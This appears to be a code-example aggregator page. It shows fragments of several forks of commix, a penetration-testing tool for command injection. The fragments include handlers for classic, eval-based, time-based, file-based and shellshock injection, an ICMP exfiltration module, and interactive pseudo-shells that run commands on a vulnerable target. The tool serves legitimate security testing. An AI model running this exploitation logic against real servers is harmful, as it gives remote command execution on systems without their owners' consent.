当前位置: 首页>>代码示例>>Python>>正文


Python logs.logs_notification函数代码示例

本文整理汇总了Python中src.utils.logs.logs_notification函数的典型用法代码示例。如果您正苦于以下问题:Python logs_notification函数的具体用法?Python logs_notification怎么用?Python logs_notification使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了logs_notification函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: input_cmd

def input_cmd(http_request_method, url, vuln_parameter, ip_src):
  print "\nPseudo-Terminal (type '?' for shell options)"
  while True:
    try:
      cmd = raw_input("Shell > ")
      if cmd.lower() in settings.SHELL_OPTIONS:
        if cmd.lower() == "?":
          menu.shell_options()
        elif cmd.lower() == "quit":
          logs.logs_notification(filename)
          os._exit(0)
        elif cmd.lower() == "back":
          os._exit(0)
        else:
          pass
      else:
        cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)

    except KeyboardInterrupt:
      print ""
      os._exit(0)
      
    except:
      print ""
      os._exit(0)
开发者ID:ksmaheshkumar,项目名称:commix,代码行数:25,代码来源:icmp_exfiltration.py

示例2: execute_file_based_technique

def execute_file_based_technique(url, delay, filename, http_request_method, url_time_response):
  if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) == False:
    if http_request_method == "GET":
      print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
    else:
      print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
  if menu.options.verbose:
    print "\n"
  percent = colors.PURPLE + "FINISHED" + Style.RESET_ALL
  sys.stdout.write(Style.BRIGHT + "\r(!) The process of testing the "+ menu.options.tech + " injection technique... " + Style.RESET_ALL +  "[ " + percent + " ]")  
  sys.stdout.flush()
  logs.logs_notification(filename)
  sys.exit(0)
开发者ID:pentestit,项目名称:commix,代码行数:13,代码来源:controller.py

示例3: input_cmd

def input_cmd(http_request_method, url, vuln_parameter, ip_src):
  print "\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
  while True:
    try:
      cmd = raw_input("Shell > ")
      if cmd == "q":
        logs.logs_notification(filename)
        os._exit(0)
      else: 
        cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)

    except KeyboardInterrupt:
      print ""
      os._exit(0)
      
    except:
      print ""
      os._exit(0)
开发者ID:yd0str,项目名称:commix,代码行数:18,代码来源:icmp_exfiltration.py

示例4: main

      except httplib.BadStatusLine, e:
          print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
          print e.line, e.message
          pass
        
    else:
      print Back.RED + "(x) Error: You must specify the target URL." + Style.RESET_ALL + "\n"
      sys.exit(0)

    # Check if defined "--proxy" option.
    if menu.options.proxy:
      proxy.do_check(url)

    # Launch injection and exploitation controller.
    controller.do_check(url, filename)

  except KeyboardInterrupt: 
    print "\n" + Back.RED + "(x) Aborted: Ctrl-C was pressed!" + Style.RESET_ALL
    logs.logs_notification(filename)
    print ""
    sys.exit(0)

  except SystemExit: 
    print ""
    sys.exit(0)

if __name__ == '__main__':
    main()
    
#eof
开发者ID:LucaBongiorni,项目名称:commix,代码行数:30,代码来源:commix.py

示例5: tfb_injection_handler


#.........这里部分代码省略.........
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            # Delete previous shell (text) files (output) from /tmp
            delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
            raise

          except SystemExit: 
            # Delete previous shell (text) files (output) from /tmp
            delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
            raise

          except:
            percent = ((num_of_chars * 100) / total)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
            if percent == 100:
              if no_result == True:
                if not menu.options.verbose:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
                  sys.stdout.flush()
                else:
                  percent = ""
                break
              else:
                percent = str(float_percent)+"%"
              #Print logs notification message
              percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              print ""
              logs.logs_notification(filename)
              raise
            else:
              percent = str(float_percent)+"%"
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if how_long == previous_how_long + delay:
            if (len(TAG) == output_length) and (is_vulnerable == True):
              found = True
              no_result = False
              is_vulnerable = False

              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              else:
                header_name = ""
                the_type = " parameter"
                if http_request_method == "GET":
开发者ID:BwRy,项目名称:commix,代码行数:67,代码来源:tfb_handler.py

示例6: tfb_injection_handler


#.........这里部分代码省略.........
                  continue
              if not settings.VERBOSITY_LEVEL >= 1:
                info_msg =  "Testing the " + technique + "... " +  "[ " + percent + " ]"
                sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                sys.stdout.flush()
                
            except KeyboardInterrupt: 
              if 'cmd' in locals():
                # Delete previous shell (text) files (output) from temp.
                delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
              raise

            except SystemExit: 
              # Delete previous shell (text) files (output) from temp.
              delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
              raise

            except:
              percent = ((num_of_chars * 100) / total)
              float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
              if str(float_percent) == "100.0":
                if no_result == True:
                  if not settings.VERBOSITY_LEVEL >= 1:
                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                    info_msg =  "Testing the " + technique + "... " +  "[ " + percent + " ]"
                    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                    sys.stdout.flush()
                  else:
                    percent = ""
                else:
                  percent = str(float_percent) + "%"
                  print ""
                  # Print logs notification message
                  logs.logs_notification(filename)
                #raise
              else:
                percent = str(float_percent) + "%"
            break
        # Yaw, got shellz! 
        # Do some magic tricks!
        if (url_time_response == 0 and (how_long - delay) >= 0) or \
           (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
           (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :

          if (len(TAG) == output_length) and \
             (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):

            found = True
            no_result = False

            if settings.LOAD_SESSION:
              possibly_vulnerable = False

            if settings.COOKIE_INJECTION == True: 
              header_name = " cookie"
              found_vuln_parameter = vuln_parameter
              the_type = " parameter"

            elif settings.USER_AGENT_INJECTION == True: 
              header_name = " User-Agent"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.REFERER_INJECTION == True: 
              header_name = " Referer"
              found_vuln_parameter = ""
开发者ID:dtrip,项目名称:commix,代码行数:67,代码来源:tfb_handler.py

示例7: eb_injection_handler


#.........这里部分代码省略.........
          else:    
            header_name = ""
            the_type = " parameter"
            if http_request_method == "GET":
              found_vuln_parameter = parameters.vuln_GET_param(url)
            else :
              found_vuln_parameter = vuln_parameter

          if len(found_vuln_parameter) != 0 :
            found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'"

          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
          logs.upload_payload(filename, counter, payload) 
          counter = counter + 1
          
          # Print the findings to terminal.
          print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
          print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
          print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
            
          # Check for any enumeration options.
          eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)

          # Check for any system file access options.
          eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)

          # Check if defined single cmd.
          if menu.options.os_cmd:
            eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)

          # Pseudo-Terminal shell
          go_back = False
          while True:
            if go_back == True:
              break
            gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
            if gotshell in settings.CHOISE_YES:
              print ""
              print "Pseudo-Terminal (type '?' for shell options)"
              while True:
                try:
                  cmd = raw_input("Shell > ")
                  if cmd.lower() in settings.SHELL_OPTIONS:
                    if cmd.lower() == "?":
                      menu.shell_options()
                    elif cmd.lower() == "quit":
                      logs.logs_notification(filename)
                      sys.exit(0)
                    elif cmd.lower() == "back":
                      go_back = True
                      break
                    else:
                      pass
                      
                  else:
                    # The main command injection exploitation.
                    response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter)
                          
                    # if need page reload
                    if menu.options.url_reload:
                      time.sleep(delay)
                      response = urllib.urlopen(url)
                      
                    # Command execution results.
                    shell = eb_injector.injection_results(response, TAG)
                    if shell:
                      shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1]
                      if shell != "":
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
                    
                except KeyboardInterrupt: 
                  raise
              
            elif gotshell in settings.CHOISE_NO:
              if menu.options.verbose:
                sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                sys.stdout.flush()
              break
            
            else:
              if gotshell == "":
                gotshell = "enter"
              print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
              pass
            
            
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
开发者ID:alvinhsian,项目名称:commix,代码行数:101,代码来源:eb_handler.py

示例8: tfb_injection_handler


#.........这里部分代码省略.........
                  else:
                    percent = ""
                else:
                  break
                    
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            percent = ((num_of_chars * 100) / total)
            if percent == 100:
              if no_result == True:
                if not menu.options.verbose:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
                  sys.stdout.flush()
                else:
                  percent = ""
                break
              else:
                percent = str(percent)+"%"
              #Print logs notification message
              percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              print ""
              logs.logs_notification(filename)
              raise
            else:
              percent = str(percent)+"%"
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay) :

            if len(TAG) == output_length:
              found = True
              no_result = False
              
              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              else:
                header_name = ""
                the_type = " parameter"
开发者ID:xstpl,项目名称:commix,代码行数:67,代码来源:tfb_handler.py

示例9: tfb_injection_handler


#.........这里部分代码省略.........
              if not menu.options.verbose:
                sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " +  "[ " + percent + " ]")
                sys.stdout.flush()
                
            except KeyboardInterrupt: 
              if 'cmd' in locals():
                # Delete previous shell (text) files (output) from temp.
                delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
              raise

            except SystemExit: 
              # Delete previous shell (text) files (output) from temp.
              delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
              raise

            except:
              percent = ((num_of_chars * 100) / total)
              float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
              if str(float_percent) == "100.0":
                if no_result == True:
                  if not menu.options.verbose:
                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                    sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " +  "[ " + percent + " ]")
                    sys.stdout.flush()
                  else:
                    percent = ""
                else:
                  percent = str(float_percent) + "%"
                #Print logs notification message
                percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
                sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " +  "[ " + percent + " ]")
                sys.stdout.flush()
                print ""
                logs.logs_notification(filename)
                raise
              else:
                percent = str(float_percent) + "%"
            break
        # Yaw, got shellz! 
        # Do some magic tricks!
        if (url_time_response == 0 and (how_long - delay) >= 0) or \
           (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
           (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :

          if (len(TAG) == output_length) and \
             (is_vulnerable == True or settings.LOAD_SESSION and is_vulnerable == "True"):

            found = True
            no_result = False

            if settings.LOAD_SESSION:
              is_vulnerable = False

            if settings.COOKIE_INJECTION == True: 
              header_name = " Cookie"
              found_vuln_parameter = vuln_parameter
              the_type = " HTTP header"

            elif settings.USER_AGENT_INJECTION == True: 
              header_name = " User-Agent"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.REFERER_INJECTION == True: 
              header_name = " Referer"
              found_vuln_parameter = ""
开发者ID:nask0,项目名称:commix,代码行数:67,代码来源:tfb_handler.py

示例10: shellshock_handler

def shellshock_handler(url, http_request_method, filename):

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()

  try: 
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)

        if not menu.options.verbose:
          percent = ((i*100)/total)
          if percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          elif cve in response.info():
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          else:
            percent = str(percent)+"%"

          sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
          sys.stdout.flush()

          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          if vp_flag == True:
            vuln_parameter = "HTTP Header"
            vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
          logs.upload_payload(filename, counter, payload) 

        if cve in response.info():
          no_result = False
          print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
          print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
          print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
          print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
          
          # Enumeration options.
          enumeration(url, cve, check_header)

          # File access options.
          file_access(url, cve, check_header)

          if menu.options.os_cmd:
            cmd = menu.options.os_cmd 
            shell = cmd_exec(url, cmd, cve, check_header)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" 
            sys.exit(0)

          else:
            while True:
              gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print "\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                while True:
                  try:
                    cmd = raw_input("Shell > ")
                    if cmd == "q":
                      logs.logs_notification(filename)
                      sys.exit(0)

                    else: 
                      shell = cmd_exec(url, cmd, cve, check_header)
                      print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" 
                      
                  except KeyboardInterrupt:
                    raise

                  except:
                    print ""
                    sys.exit(0)

              elif gotshell in settings.CHOISE_NO:
                if menu.options.verbose:
                  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                  sys.stdout.flush()
                break
#.........这里部分代码省略.........
开发者ID:yd0str,项目名称:commix,代码行数:101,代码来源:shellshock.py

示例11: tb_injection_handler


#.........这里部分代码省略.........
                    continue
                if not settings.VERBOSITY_LEVEL >= 1:
                  info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " +  "[ " + percent + " ]"
                  sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                  sys.stdout.flush()

              except KeyboardInterrupt: 
                raise

              except SystemExit:
                raise

              except EOFError:
                err_msg = "Exiting, due to EOFError."
                print settings.print_error_msg(err_msg)
                raise

              except:
                percent = ((num_of_chars * 100) / total)
                float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
                if str(float_percent) == "100.0":
                  if no_result == True:
                    if not settings.VERBOSITY_LEVEL >= 1:
                      percent = Fore.RED + "FAILED" + Style.RESET_ALL
                      info_msg =  "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " +  "[ " + percent + " ]"
                      sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                      sys.stdout.flush()
                    else:
                      percent = ""
                  else:
                    percent = str(float_percent) + "%"
                    print ""
                    # Print logs notification message
                    logs.logs_notification(filename)
                  #raise
                else:
                  percent = str(float_percent) + "%"
              break
              
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response == 0 and (how_long - timesec) >= 0) or \
             (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \
             (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) :  
            if (len(TAG) == output_length) and \
               (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):

              found = True
              no_result = False
              # Check injection state
              settings.DETECTION_PHASE = False
              settings.EXPLOITATION_PHASE = True
              if settings.LOAD_SESSION:
                possibly_vulnerable = False

              if settings.COOKIE_INJECTION == True: 
                header_name = " cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " parameter"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
开发者ID:security-geeks,项目名称:commix,代码行数:67,代码来源:tb_handler.py

示例12: tb_injection_handler


#.........这里部分代码省略.........
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()

          except KeyboardInterrupt: 
            raise
        
          except:
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay):

            if len(TAG) == output_length :
              found = True
              no_result = False

              if settings.COOKIE_INJECTION == True: 
                http_request_method = "cookie"
                found_vuln_parameter = vuln_parameter
              else:
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + Style.RESET_ALL

              # Check for any enumeration options.
              tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

              # Check for any system file access options.
              tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
              
              # Pseudo-Terminal shell
              while True:
                gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd == "q":
                        logs.logs_notification(filename)
                        sys.exit(0)
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output  = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

                      if menu.options.verbose:
                        print ""
                      if output != "" and check_how_long != 0 :
                        print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                        print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                      else:
                        print ""
                        
                    except KeyboardInterrupt: 
                      raise
                  
                elif gotshell in settings.CHOISE_NO:
                  break
                  if menu.options.verbose:
                    sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                    sys.stdout.flush()
                
                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
            
            break
          
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
开发者ID:yd0str,项目名称:commix,代码行数:101,代码来源:tb_handler.py

示例13: do_check


#.........这里部分代码省略.........
  modules_handler.load_modules(url, http_request_method, filename)

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    header_name = " Cookie"
    check_parameter  = parameters.specify_cookie_parameter(menu.options.cookie)
    the_type = " HTTP header "
            
  # User-Agent Injection
  elif settings.USER_AGENT_INJECTION == True:
    header_name = " User-Agent"
    check_parameter  = ""
    the_type = " HTTP header "

  # Referer Injection
  elif settings.REFERER_INJECTION == True:
    header_name = " Referer"
    check_parameter  = ""
    the_type = " HTTP header "

  else : 
    pass

  if len(check_parameter) != 0 :
    check_parameter = " '" + check_parameter + "'"

  print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, delay)

  # Check all injection techniques
  if not menu.options.tech:
    # Check if it is vulnerable to classic command injection technique.
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True

    # Check if it is vulnerable to eval-based command injection technique.
    if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
      eval_based_state = True

    # Check if it is vulnerable to time-based blind command injection technique.
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      time_based_state = True

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
      file_based_state = True

  else:
    # Check if it is vulnerable to classic command injection technique.
    if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
      # Check if classic results-based command injection technique succeeds.
      if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
        classic_state = True
    elif menu.options.tech == "classic":
      cb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      classic_state = False

    # Check if it is vulnerable to eval-based command injection technique.
    if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
      # Check if eval-based command injection technique succeeds.
      if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
        eval_based_state = True
    elif menu.options.tech == "eval-based":
      eb_handler.exploitation(url, delay, filename, http_request_method)
    else:
      eval_based_state = False

    # Check if it is vulnerable to time-based blind command injection technique.
    if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
      # Check if time-based blind command injection technique succeeds.
      if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        time_based_state = True
    elif menu.options.tech == "time-based":
      tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      time_based_state = False

    # Check if it is vulnerable to file-based semiblind command injection technique.
    if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
       # Check if file-based semiblind command injection technique succeeds.
      if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
        file_based_state = True
    elif menu.options.tech == "file-based":
      fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
    else:
      file_based_state = False

  if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
    if http_request_method == "GET":
      print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
    else:
      print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
  else:
    logs.logs_notification(filename)
  sys.exit(0)
  
#eof
开发者ID:Q-jone,项目名称:commix,代码行数:101,代码来源:controller.py

示例14: cb_injection_handler


#.........这里部分代码省略.........
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                else:
                  percent = str(percent)+"%"
              elif len(shell) != 0:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              else:
                percent = str(percent)+"%"
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            if settings.COOKIE_INJECTION == True: 
              http_request_method = "cookie"
              found_vuln_parameter = vuln_parameter
            else:
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
            logs.upload_payload(filename, counter, payload) 
            counter = counter + 1
            
            # Print the findings to terminal.
            print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
            print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
            print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
            print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
              
            # Check for any enumeration options.
            cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)

            # Check for any system file access options.
            cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
            
            # Pseudo-Terminal shell
            while True:
              gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                while True:
                  try:
                    cmd = raw_input("Shell > ")
                    if cmd == "q":
                      logs.logs_notification(filename)
                      sys.exit(0)
                      
                    else:
                      # Command execution results.
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
                      
                      # if need page reload
                      if menu.options.url_reload:
                        time.sleep(delay)
                        response = urllib.urlopen(url)
                        
                      # Evaluate injection results.
                      shell = cb_injector.injection_results(response, TAG)
                      if shell:
                        shell = "".join(str(p) for p in shell)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"

